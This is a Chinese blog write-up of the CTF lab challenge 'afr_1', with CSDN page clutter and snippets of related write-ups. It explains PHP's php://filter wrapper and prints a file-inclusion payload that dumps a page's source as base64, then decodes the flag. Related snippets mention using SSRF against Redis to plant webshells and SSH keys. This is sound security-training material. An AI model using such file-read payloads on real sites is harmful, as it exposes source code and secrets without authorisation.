《从0到1:CTFer成长之路》afr_1

最新推荐文章于 2024-05-14 07:39:16 发布
最新推荐文章于 2024-05-14 07:39:16 发布
阅读量2k 收藏
点赞数 1
分类专栏: 《从0到1:CTFer成长之路》 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43651049/article/details/122463712
版权

文章目录

靶场:afr_1

在这里插入图片描述

知识点

  • PHP向用户提供的指定待打开文件的方式,是一个文件流
  • PHP的Filter机制,可对目前的协议进行一定的处理,比如将当前文件流的内容进行Base64编码。
  • http://127.0.0.1/cmd.php?file=php://filter/convert.base64-encode/resource=cmd
  • 利用Filter机制,构造形如以上的攻击数据可以读取文件,拿到各种文件的源码

解题过程

  1. 首页
    http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=hello
    在这里插入图片描述2. 使用php://filter读取源代码并进行base64编码输出
    http://c31a4949-59d4-407e-ac06-ca7850b56265.node4.buuoj.cn:81/?p=php://filter/convert.base64-encode/resource=flag

PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
在这里插入图片描述

  1. 使用base64解码
<?php
die('no no no');
//n1book{afr_1_solved}

Flag:n1book{afr_1_solved}

ZhShy23
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
AFR1:改写AFR
03-19
AFR1:改写AFR
智能车光电传感器布局对路径识别的影响研究
02-20
智能车光电传感器布局对路径识别的影响研究
[第一章 web入门]afr_1 解题思路
xiyuanyue的博客
10-10 154
1、通过dirsearch 扫描,发现存在flag.php和index.php。/* 这会以大写字母输出 www.example.com 的全部内容 *//* 这会和以上所做的一样,但还会用 ROT13 加密。index.php 文件内容自动跳转到/?2、通过伪协议读取内容。flag.php 内容。
i春秋《从0到1:CTFer成长之路》通关WP
07-08 4363
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
2024年最新《从0到1:CTFer成长之路》2,2024年最新物联网嵌入式开发
最新发布
2401_85013357的博客
05-14 749
攻击者通过SSRF漏洞未授权访问内网Redis,可能导致任意增、查、删、改其中的内容,甚至利用导出功能写入Crontab、Webshell和SSH公钥(使用导出功能写入的文件所有者为redis的启动用户,一般启动用户为root,如果启动用户权限较低,将无法完成攻击)。Redis是一条指令执行一个行为,如果其中一条指令是错误的,那么会继续读取下一条,所以如果发送的报文中可以控制其中一行,就可以将其修改为Redis指令,分批执行指令,完成攻击。首先,FastCGI本质上是一个协议,在CGI的基础上进行了优化。
从0到1——CTFer成长之路(三)
youngerll的博客
03-09 826
从0到1——CTFer成长之路(三)SSRF漏洞SSRF Training命令执行漏洞死亡ping命令XSS的魔力XSS闯关web文件上传漏洞文件上传 第二章 web进阶 SSRF漏洞 SSRF Training 命令执行漏洞 死亡ping命令 XSS的魔力 XSS闯关 web文件上传漏洞 文件上传 ...
从0到1CTFer成长之路——1git(全网最详细)
m0_52555753的博客
11-15 1265
网络安全
01ctfer/任意文件读取/afr_1 题解
QYbkx974的博客
11-15 146
sudo docker-compose up -d 拉取镜像。docker-compose.yml 文件名称。,存在url传参,直接输入。猜测存在过滤,代码可能为。加入.php后缀后不输出。了,可以使用封装协议中的。,使用base64解码。发现打开该网页时出现。
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习
07-10
使用到的虹软的SDK包中,提供了人脸识别的库,它的名字叫face_recongnition.dll,我们找到它的SDK文档。 来建立各个结构体和API的C#映射。 讲解原始SDK文档中的数据结构和C#数组结构如何映射的,也不再讲解P/Invoke...
士研电机液面控制器AFR-1说明书.pdf
09-11
士研电机液面控制器AFR-1说明书pdf,士研电机液面控制器AFR-1说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞
AAAAAAAAAAAA66的博客
11-20 834
知识面决定攻击的广度,知识链决定攻击的深度。 最近尝试了一下挖洞,捣鼓了一天还是啥都没有,没有头绪后,还是去写点CTF题,扩充下知识面,2个方向算是互补吧。 工具 dirsearch(目录扫描工具) 火狐 hackbar 知识点 php://伪协议 php://伪协议是PHP提供的一些输入输出流访问功能,允许访问PHP的输入输出流,标准输入输出的错误描述符,内存中,磁盘备份的临时文件流,以及可以操作其他读取和写入文件资源的过滤器。 php://filter是元封装器...
从0到1CTFer成长之路-第一章-CTF中的SQL注入
黑白的博客
03-01 1914
CTF中的SQL注入 声明 好好向大佬们学习!!! 攻击 https://book.nu1l.com/tasks/#/pages/web/1.2 SQL注入-1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 开启docker .
《从0到1:CTFer成长之路》书籍配套题目--afr_3 BUUCTF
wuyaowangchuan的博客
11-19 2714
还是任意文件读取漏洞 进入坏境 点入链接 这边可以读取文件 试一试article?name=/etc/passwd 读不到flag 找找WP /proc/sched_debug # 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用 /proc/mounts # 挂载的文件系统列表 /proc/net/arp # arp表,可以获得内网其他机器的地址 /proc/net/route # 路由表信息 /proc/net/tcp and /proc/net/udp .
NU1LCTFer成长之路-web入门-任意文件读取漏洞-afr_1-wp
居上
06-29 310
afr_1 payload http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag 这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag; BP base64解码得到flag ...
《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集
Senimo
12-21 2106
《从0到1:CTFer成长之路》 [第一章 web入门] 常见的搜集 启动环境: 提示为敏感文件,首先对网站目录进行扫描: 得到如上页面,首先访问robots.txt页面: 得到flag1在/flag1_is_her3_fun.txt页面中,访问: 得到第一部分的flag,再访问index.php~页面: 得到第二部分的flag2,最后访问.index.php.swp,下载得到: 使用记事本或word打开,得到flag3: 拼接后得到完整的flag: n1book{info_1s_v3ry_i
从0到1 CTFer成长之路——信息收集笔记(1)
10-24 2400
举足轻重的信息收集 信息收集的分类 1.1.2.1 敏感目录泄露 意义:通过敏感目录泄露,我们往往能够获取网站的源代码和敏感的URL地址,如网站的后台地址等。 git泄露 (分布式版本控制系统) hacker可以通过.git文件夹的信息获取开发人员提交的所有源码,进而可能导致服务器被攻击而沦落。 (1)常规git泄露 工具:scrabble 用法: ./scrabble URL (2)git回滚 当flag(敏感文件)可能在修改中被删除了或被覆盖了 fit reset --hard HEAD^ 我
CTF 小白教程《从0到1:CTFer成长之路》SQL - 2 解题过程
在下小黄的博客
06-07 2409
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: 小白教程《从0到1:CTFer成长之路》结题过程 《从0到1:CTFer成长之路》书籍配套题目,点击即可打开 - 实验环境(i 春秋 需要登录) 微信公众号回复:【CTF】,即可获取本文全部涉及到的工具。 创建时间:2021年5月30日 软件: MindMaster Pro、kali 这里写目录标题CTF中
从0到1ctfer成长之路配套逆向题 babyconst
qq_35576225的博客
11-07 487
来源:https://book.nu1l.com/tasks/#/pages/reverse/5.4 1.用ida打开发现是输入一个48位的字符串加密后进行比较。 2.发现第一个函数中涉及到了一些常数,用para检查后发现是属于md5加密。 3.分析后发现603080位置开始存放着加密后的字符串,正好每次地址位置差16也就是16进制的十,每个地址保存着一个字节也就是8位,是四个字符加密后形成了32位。 4.找到一个在线的md5解码网站,查询后还原得到4位,重复12次后,得到fla
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过将人脸图像输入到虹软人脸识别SDK中,可以得到一个AFR_FSDK_FACEMODEL结构体,该结构体中存储了该人脸的特征数据。在进行人脸比对时,只需要将两个人脸的特征数据进行比对即可。\n\

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ZhShy23

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值